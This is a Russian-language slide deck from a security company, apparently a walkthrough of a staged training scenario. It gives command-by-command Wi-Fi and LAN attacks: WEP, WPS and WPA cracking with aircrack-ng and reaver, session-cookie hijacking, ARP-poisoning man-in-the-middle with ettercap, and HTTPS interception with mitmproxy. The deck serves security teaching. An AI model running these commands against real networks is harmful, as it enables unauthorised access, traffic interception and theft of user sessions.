Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo
Get_Inside
Дмитрий Мирошниченко
ЗАО «Перспективный мониторинг»
План помещений
Прошлая архитектура системы
Новая архитектура системы
Прошлый план атаки
Новый план атаки
Первый этап (охранник)
Атакуем канальный уровень
Немного теории
WEP (wired equivalent privacy)
Недостатки: коллизии IV. Для атаки на WEP
необходимо несколько 10К кадров с IV.
Подготовка интерфейса
iwconfig – перечень wi-fi интерфейсов
service network-manager stop -
остановка посторонних сервисов
airmon-ng start <интерфейс> -
создание виртуального promiscous
интерфейса.
Подготовка интерфейса
airodump-ng mon0 – проверка
работоспособности интерфейса, поиск
целевой АП.
Ломаем WEP
airodump-ng -w <имя_файла> --bssid
<bssid> -c <канал> mon0 - запись
траффика с векторами
инициализации.
aircrack-ng <cap._файл> - ломаем
ключ WEP
ARP протокол
Ломаем WEP
aireplay-ng --arpreplay -b <bssid> mon0
- arp-replay атака.
aireplay-ng --deauth 1 -a <BSSID> mon0
деаутентификация клиента для
получения arp пакета
802.11 аутентификация
aireplay-ng --fakeauth 10 -a <bssid>
mon0 - аутентификация с ТД.
Ломаем WEP
aireplay-ng --arpreplay -b <bssid> -x 20
mon0 - arp-replay атака, с
ограничением 20 пакетов в секунду.
Атакуем сетевой уровень
Wireshark, анализ трафика
iwconfig <interface> channel <channel>
- настройка интерфейса на
прослушивание на определенном
канале
Capture->Interfaces->mon0->Start -
анализ трафика на интерфейсе mon0
Wireshark, анализ трафика
wlan.bssid == <bssid> - фильтр
отображения по bssid
Edit->Preferences->Protocols-
>IEEE_802.11->Edit->New-><wep key> -
настройка дешифрования трафика
Атакуем прикладной уровень
Wireshark, анализ трафика
http - фильтр отображения http
пакетов.
follow tcp stream - сбор TCP сессии
HTTP сессия
Угон сессии
Устанавливаем в браузер
перехваченный токен сессии (Firefox -
“Cookie manager”. Chromium - “Edit
this cookie”).
PROFIT!
Второй этап (охранник)
Сканирование
ifconfig - список сетевых интерфейсов
с присвоенными ip адресами
nmap -sn <диапазон адресов> - поиск
активных хостов в диапазоне адресов
Атакуем канальный уровень
MitM ARP poisoning
ARP poisoning
echo 1 > /proc/sys/net/ipv4/ip_forward -
включаем форвардинг пакетов
ettercap -T -M arp -o -i wlan1 /<target1_ip>/
/<target2_ip>/ - митм трафика между
целевыми хостами
Атакуем сетевой уровень
Wireshark, анализ трафика
iwconfig <interface> channel <channel>
- настройка интерфейса на
прослушивание на определенном
канале.
Capture->Interfaces->wlan1>Start -
анализ трафика на интерфейсе wlan1
Атакуем сеансовый уровень
Вскрываем HTTPS теория
Вскрываем HTTPS
by Ettercap
nano /etc/ettercap/etter.conf -
редактируем файл конфигурации
ettercap -T -M arp -i wlan1
/<target1_ip>/ /<target2_ip>/ -
перехват и просмотр траффика
Вскрываем HTTPS
by mitmproxy
echo 1 > /proc/sys/net/ipv4/ip_forward -
включаем форвардинг пакетов
iptables -t nat -A PREROUTING -i wlan1 -p
tcp --dport 80 -j REDIRECT --to-port 8080
Вскрываем HTTPS
iptables -t nat -A PREROUTING -i wlan1
-p tcp --dport 443 -j REDIRECT --to-port
8080
ettercap -T -M arp -o -i wlan1
/<target1_ip>/ /<target2_ip>/ - митм
трафика между целевыми хостами
mitmproxy -T - запускаем mitmproxy
Установка mitmproxy
apt-get install python-pip
apt-get install libxml2-dev
apt-get install libxslt-dev
pip install --upgrade six
pip install mitmproxy
pip install --upgrade mitmproxy.
Для тех, кому не хватило
Ломаем WPS
wash -i mon0 - список ТД поддерживающих
WPS
reaver -i mon0 -b <ap_bssid> - взлом ТД по
WPS
Немного теории
WPA2 (wi-fi protected access 2):
4-way handshake
Немного теории
Взлом WPA/WPA2 перебором
Ломаем WPA
airodump-ng -w <имя_файла> --bssid
<bssid> -c <канал> mon0 - запись
траффика с хендшейком.
aireplay-ng --deauth 1 -a <BSSID> mon0
деаутентификация клиента для
получения 4-way handshake
Ломаем WPA
/usr/share/wordlists/rockyou.txt.gz -
расположение словаря
gzip -d /usr/share/wordlists/rockyou.txt.gz -
распаковка словаря
aircrack-ng <.cap_файл> -w <файл_словарь>
- взлом хендшейка по словарю
Спасибо за внимание!
Дмитрий Мирошниченко
ЗАО «Перспективный мониторинг»

More Related Content

Get inside stage2 new